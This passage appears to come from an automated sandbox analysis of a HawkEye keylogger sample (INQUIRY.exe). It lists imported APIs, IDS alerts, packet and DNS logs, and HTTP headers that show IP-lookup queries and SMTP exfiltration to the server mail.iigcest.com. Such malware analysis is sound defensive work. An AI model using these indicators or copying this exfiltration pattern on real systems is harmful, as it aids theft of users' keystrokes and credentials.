GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardType, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                      kernel32.dllSleep
                                                                      oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                      comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                      kernel32.dllMulDiv

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      11/18/20-15:02:26.704911TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49750587192.168.2.4166.62.27.57
                                                                      11/18/20-15:03:08.289546TCP2019926ET TROJAN HawkEye Keylogger Report SMTP49774587192.168.2.4166.62.27.57

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2020 15:01:59.031246901 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.047661066 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.047848940 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.048484087 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.064749956 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.071091890 CET8049743104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.108748913 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.117561102 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.125319004 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.126780987 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.169167995 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.185825109 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.185980082 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.186119080 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.186583042 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.197808981 CET49744443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.199700117 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.214375019 CET44349744104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.216025114 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.216219902 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.216970921 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.233329058 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235097885 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235296011 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:01:59.235400915 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.236514091 CET49745443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:01:59.252928972 CET44349745104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:23.817213058 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.098351955 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:24.098483086 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.647198915 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:24.822807074 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:24.825001001 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.106144905 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.106544971 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.388585091 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.388873100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:25.710129023 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858115911 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:25.858395100 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.139451027 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.139874935 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.422636032 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.422939062 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.703771114 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.703959942 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.704910994 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.704945087 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705151081 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705218077 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705363989 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.705427885 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:26.986233950 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.986258984 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:26.999335051 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.002060890 CET58749750166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:02:27.057396889 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:33.383512020 CET4974380192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:33.383887053 CET49750587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:02:38.505419016 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.521910906 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.522161961 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.523021936 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.539441109 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.549550056 CET8049759104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.597470045 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.613935947 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.614130020 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.673311949 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.689773083 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690314054 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690376043 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.690885067 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.693752050 CET49761443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.695373058 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.710299015 CET44349761104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711641073 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.711795092 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.712759972 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.714680910 CET4975980192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.729115963 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729497910 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729578018 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:02:38.729635954 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.731683016 CET49763443192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:02:38.747950077 CET44349763104.16.154.36192.168.2.4
                                                                      Nov 18, 2020 15:03:05.906356096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.168962955 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.169061899 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.695435047 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.695717096 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:06.958623886 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:06.959141970 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.222193003 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.223017931 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.495678902 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.495965004 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:07.758713007 CET58749774166.62.27.57192.168.2.4
                                                                      Nov 18, 2020 15:03:07.758955002 CET49774587192.168.2.4166.62.27.57
                                                                      Nov 18, 2020 15:03:08.022917032 CET58749774166.62.27.57192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2020 15:01:43.623750925 CET6454953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:43.650897980 CET53645498.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:45.449043989 CET6315353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:45.475955009 CET53631538.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:46.248142004 CET5299153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:46.275309086 CET53529918.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:47.094983101 CET5370053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:47.122129917 CET53537008.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:47.915492058 CET5172653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:47.943371058 CET53517268.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:48.590341091 CET5679453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:48.617573977 CET53567948.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:49.659903049 CET5653453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:49.687086105 CET53565348.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:50.457806110 CET5662753192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:50.495663881 CET53566278.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:54.680612087 CET5662153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:54.707959890 CET53566218.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:55.514782906 CET6311653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:55.541924000 CET53631168.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:56.319547892 CET6407853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:56.346719980 CET53640788.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:57.273447990 CET6480153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:57.300653934 CET53648018.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.292248964 CET6172153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:58.319410086 CET53617218.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.704564095 CET5125553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:58.741070986 CET53512558.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.971637011 CET6152253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:59.006939888 CET53615228.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:59.079847097 CET5233753192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:59.106956959 CET53523378.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:02.765192986 CET5504653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:02.792345047 CET53550468.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:11.437201977 CET4961253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:11.464301109 CET53496128.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:22.060935974 CET4928553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:22.088042021 CET53492858.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:23.770134926 CET5060153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:23.815956116 CET53506018.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:32.777748108 CET6087553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:32.804969072 CET53608758.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:35.306493044 CET5644853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:35.342278957 CET53564488.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:35.996299028 CET5917253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.031609058 CET53591728.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:36.529362917 CET6242053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.565490007 CET53624208.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:36.900733948 CET6057953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.960184097 CET53605798.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:37.449456930 CET5018353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:37.485517025 CET53501838.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:37.910711050 CET6153153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:37.937813044 CET53615318.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.128568888 CET4922853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.164376020 CET53492288.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.443804026 CET5979453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.471159935 CET53597948.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.472012043 CET5591653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.507505894 CET53559168.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.556760073 CET5275253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.592199087 CET53527528.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.655498981 CET6054253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.690794945 CET53605428.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:39.171142101 CET6068953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:39.207019091 CET53606898.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:39.929310083 CET6420653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:39.956566095 CET53642068.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:41.034682989 CET5090453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:41.072463989 CET53509048.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:43.444211006 CET5752553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:43.471467018 CET53575258.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:55.619406939 CET5381453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:55.656312943 CET53538148.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:04.388042927 CET5341853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:04.415371895 CET53534188.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:05.854183912 CET6283353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:05.904856920 CET53628338.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:20.956906080 CET5926053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:20.992511988 CET53592608.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:21.287211895 CET4994453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:21.314351082 CET53499448.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:21.386476994 CET6330053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:21.424304962 CET53633008.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:24.213391066 CET6144953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:24.240730047 CET53614498.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:24.378654003 CET5127553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:24.414350033 CET53512758.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:26.271187067 CET6349253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:26.298304081 CET53634928.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.447617054 CET5894553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.483230114 CET53589458.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.766551018 CET6077953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.802285910 CET53607798.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.881725073 CET6401453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.917220116 CET53640148.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:38.988058090 CET5709153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:39.015259027 CET53570918.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:46.905772924 CET5590453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:46.933022976 CET53559048.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:56.111162901 CET5210953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:56.138288021 CET53521098.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.602796078 CET5445053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.638335943 CET53544508.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.673490047 CET4937453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.700529099 CET53493748.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.756617069 CET5043653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.791821003 CET53504368.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Nov 18, 2020 15:01:58.704564095 CET192.168.2.48.8.8.80x7fd8Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:01:58.971637011 CET192.168.2.48.8.8.80x27c4Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.079847097 CET192.168.2.48.8.8.80x7cb6Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:23.770134926 CET192.168.2.48.8.8.80xb5a3Standard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.128568888 CET192.168.2.48.8.8.80x8bd0Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.443804026 CET192.168.2.48.8.8.80x9673Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.556760073 CET192.168.2.48.8.8.80x19cStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:05.854183912 CET192.168.2.48.8.8.80x697aStandard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:20.956906080 CET192.168.2.48.8.8.80xa2aaStandard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.287211895 CET192.168.2.48.8.8.80x557aStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.386476994 CET192.168.2.48.8.8.80x5ae3Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.447617054 CET192.168.2.48.8.8.80x53b6Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.766551018 CET192.168.2.48.8.8.80x5dfbStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.881725073 CET192.168.2.48.8.8.80x5d23Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.602796078 CET192.168.2.48.8.8.80x70c7Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.673490047 CET192.168.2.48.8.8.80x279fStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.756617069 CET192.168.2.48.8.8.80x506Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Nov 18, 2020 15:01:58.741070986 CET8.8.8.8192.168.2.40x7fd8Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.006939888 CET8.8.8.8192.168.2.40x27c4No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.006939888 CET8.8.8.8192.168.2.40x27c4No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.106956959 CET8.8.8.8192.168.2.40x7cb6No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.106956959 CET8.8.8.8192.168.2.40x7cb6No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:23.815956116 CET8.8.8.8192.168.2.40xb5a3No error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.164376020 CET8.8.8.8192.168.2.40x8bd0Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.471159935 CET8.8.8.8192.168.2.40x9673No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.471159935 CET8.8.8.8192.168.2.40x9673No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.592199087 CET8.8.8.8192.168.2.40x19cNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.592199087 CET8.8.8.8192.168.2.40x19cNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:05.904856920 CET8.8.8.8192.168.2.40x697aNo error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:20.992511988 CET8.8.8.8192.168.2.40xa2aaName error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.314351082 CET8.8.8.8192.168.2.40x557aNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.314351082 CET8.8.8.8192.168.2.40x557aNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.424304962 CET8.8.8.8192.168.2.40x5ae3No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.424304962 CET8.8.8.8192.168.2.40x5ae3No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.483230114 CET8.8.8.8192.168.2.40x53b6Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.802285910 CET8.8.8.8192.168.2.40x5dfbNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.802285910 CET8.8.8.8192.168.2.40x5dfbNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.917220116 CET8.8.8.8192.168.2.40x5d23No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.917220116 CET8.8.8.8192.168.2.40x5d23No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.638335943 CET8.8.8.8192.168.2.40x70c7Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.700529099 CET8.8.8.8192.168.2.40x279fNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.700529099 CET8.8.8.8192.168.2.40x279fNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • whatismyipaddress.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449743104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:01:59.048484087 CET348OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:01:59.071091890 CET349INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:01:59 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:01:59 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d42940f0000c2810dbe2000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423a0018cdc281-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449759104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
